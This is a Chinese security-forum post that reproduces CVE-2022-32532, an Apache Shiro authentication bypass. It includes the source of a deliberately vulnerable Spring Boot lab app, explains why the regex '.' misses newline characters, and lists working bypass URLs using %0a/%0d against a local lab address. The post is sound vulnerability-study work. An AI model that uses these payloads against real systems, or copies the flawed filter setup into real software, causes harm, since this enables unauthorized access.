论坛首页 > 技术文章投稿区 > 漏洞文章

CVE-2022-32532漏洞复现

清欢   ·   发表于 2023-08-02 13:58:36   ·   漏洞文章

CVE-2022-32532漏洞复现

漏洞介绍

  1. CVE-2022-32532是一个Apache Shiro 权限绕过漏洞,当 Apache Shiro 中使用 RegexRequestMatcher 进行权限配置,
  2. 且正则表达式中携带“.”时,构造特定的payload,可以实现绕过身份认证。

环境搭建

漏洞复现的环境使用的是4ra1n师傅在GitHub上的漏洞环境

  1. https://github.com/Lay0us1/CVE-2022-32532

pom.xml

  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  3.          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  4.     <modelVersion>4.0.0</modelVersion>
  5.     <parent>
  6.         <groupId>org.springframework.boot</groupId>
  7.         <artifactId>spring-boot-starter-parent</artifactId>
  8.         <version>2.7.0</version>
  9.         <relativePath/>
  10.     </parent>
  11.     <groupId>com.example</groupId>
  12.     <artifactId>shiro-demo</artifactId>
  13.     <version>0.0.1-SNAPSHOT</version>
  14.     <name>shiro-demo</name>
  15.     <description>CVE-2022-32532</description>
  16.     <properties>
  17.         <java.version>1.8</java.version>
  18.     </properties>
  19.     <dependencies>
  20.         <dependency>
  21.             <groupId>org.springframework.boot</groupId>
  22.             <artifactId>spring-boot-starter-web</artifactId>
  23.         </dependency>
  24.         <dependency>
  25.             <groupId>org.apache.shiro</groupId>
  26.             <artifactId>shiro-spring</artifactId>
  27.             <version>1.9.0</version>
  28.         </dependency>
  29.     </dependencies>
  30.     <build>
  31.         <plugins>
  32.             <plugin>
  33.                 <groupId>org.springframework.boot</groupId>
  34.                 <artifactId>spring-boot-maven-plugin</artifactId>
  35.             </plugin>
  36.         </plugins>
  37.     </build>
  38. </project>

ShiroConfig

  1. 用来配置apache shiro的一个类
  1. package com.example.shirodemo;
  3. import org.apache.shiro.mgt.SecurityManager;
  4. import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
  5. import org.springframework.context.annotation.Bean;
  6. import org.springframework.context.annotation.Configuration;
  8. @Configuration
  9. public class ShiroConfig {
  11.     @Bean
  12.     public SecurityManager securityManager() {
  13.         return new DefaultWebSecurityManager();
  14.     }
  16.     @Bean
  17.     public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
  18.         MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
  19.         shiroFilterFactoryBean.setSecurityManager(securityManager);
  20.         return shiroFilterFactoryBean;
  21.     }
  22. }

MyShiroFilterFactoryBean

  1. 用来配置shiro使用的过滤方式
  1. package com.example.shirodemo;
  3. import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
  4. import org.apache.shiro.mgt.SecurityManager;
  5. import org.apache.shiro.util.RegExPatternMatcher;
  6. import org.apache.shiro.web.filter.mgt.*;
  7. import org.apache.shiro.web.mgt.WebSecurityManager;
  8. import org.apache.shiro.web.servlet.AbstractShiroFilter;
  11. public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
  13.     public MyShiroFilterFactoryBean() {
  14.         super();
  15.     }
  17.     @Override
  18.     protected AbstractShiroFilter createInstance() {
  19.         SecurityManager securityManager = this.getSecurityManager();
  20.         FilterChainManager manager = new DefaultFilterChainManager();
  21.         manager.addFilter("myFilter",new MyFilter());
  22.         // my filter
  23.         manager.addToChain("/permit/.*", "myFilter");
  24.         // todo: add other filters
  26.         PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
  27.         chainResolver.setFilterChainManager(manager);
  28.         // set RegExPatternMatcher
  29.         chainResolver.setPathMatcher(new RegExPatternMatcher());
  30.         return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
  31.     }
  33.     static class SpringShiroFilter extends AbstractShiroFilter {
  34.         protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
  35.             this.setSecurityManager(webSecurityManager);
  36.             this.setFilterChainResolver(resolver);
  37.         }
  38.     }
  39. }

MyFilter

  1. package com.example.shirodemo;
  3. import org.apache.shiro.util.RegExPatternMatcher;
  4. import org.apache.shiro.web.filter.AccessControlFilter;
  6. import javax.servlet.ServletRequest;
  7. import javax.servlet.ServletResponse;
  8. import javax.servlet.http.HttpServletRequest;
  9. import java.io.IOException;
  11. public class MyFilter extends AccessControlFilter {
  13.     public MyFilter(){
  14.         super();
  15.         this.pathMatcher = new RegExPatternMatcher();
  16.     }
  18.     @Override
  19.     protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
  20.         String token = ((HttpServletRequest)request).getHeader("Token");
  21.         // todo: check permission ...
  22.         return token != null && token.equals("4ra1n");
  23.     }
  25.     @Override
  26.     protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
  27.         System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
  28.         try {
  29.             response.getWriter().println("access denied");
  30.         } catch (IOException e) {
  31.             e.printStackTrace();
  32.         }
  33.         return false;
  34.     }
  35. }

DemoController

  1. package com.example.shirodemo;
  3. import org.springframework.web.bind.annotation.PathVariable;
  4. import org.springframework.web.bind.annotation.RequestMapping;
  5. import org.springframework.web.bind.annotation.RestController;
  7. @RestController
  8. public class DemoController {
  9.     @RequestMapping(path = "/permit/{value}")
  10.     public String permit(@PathVariable String value) {
  11.         System.out.println("success!");
  12.         return "success";
  13.     }
  15.     // Another Bypass
  16.     // @RequestMapping(path = "/permit/*")
  17.     public String permit() {
  18.         System.out.println("success!");
  19.         return "success";
  20.     }
  21. }

整个目录结构

漏洞核心分析:

  1. 1.RegExPatternMatcher()
  2. 2./permit/.*
  3. shiro使用RegExPatternMatcher()时候,就会使用正则表达式进行过滤,当你的过滤表达式为:/permit/.*时候,你可能想表达的
  4. 意思是/permit/目录下的全部子路径,但是在正则表达式中"."这个元字符,是不包括/r和/n的,也就是说,绕过/permit/后面的子目录
  5. 中存在/r或者/n,则就无法匹配上,从而实现了apache shiro的绕过

漏洞复现

  1. 利用上述环境,使用idea进行启动

访问/permit/fkalis,发现没有权限

尝试构造payload

  1. http://192.168.2.8:8081/permit/%0afkalis
  2. http://192.168.2.8:8081/permit/%0dfkalis
  3. http://192.168.2.8:8081/permit/%0a%0dfkalis

成功绕过shiro的检验

  1. spring security中也有个类似的原理的漏洞,也是利用正则表达式处理的问题,从而可以实现绕过
用户名金币积分时间理由
Track-魔方 100.00 0 2023-08-08 11:11:29 期待同学更多实战方面的文章~

打赏我,让我更有动力~

1 条回复   |  直到 2023-8-8 | 908 次浏览

Track-魔方
发表于 2023-8-8

与CVE-2022-22978漏洞产生原理本质上是一样的,因此放到一起打赏

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.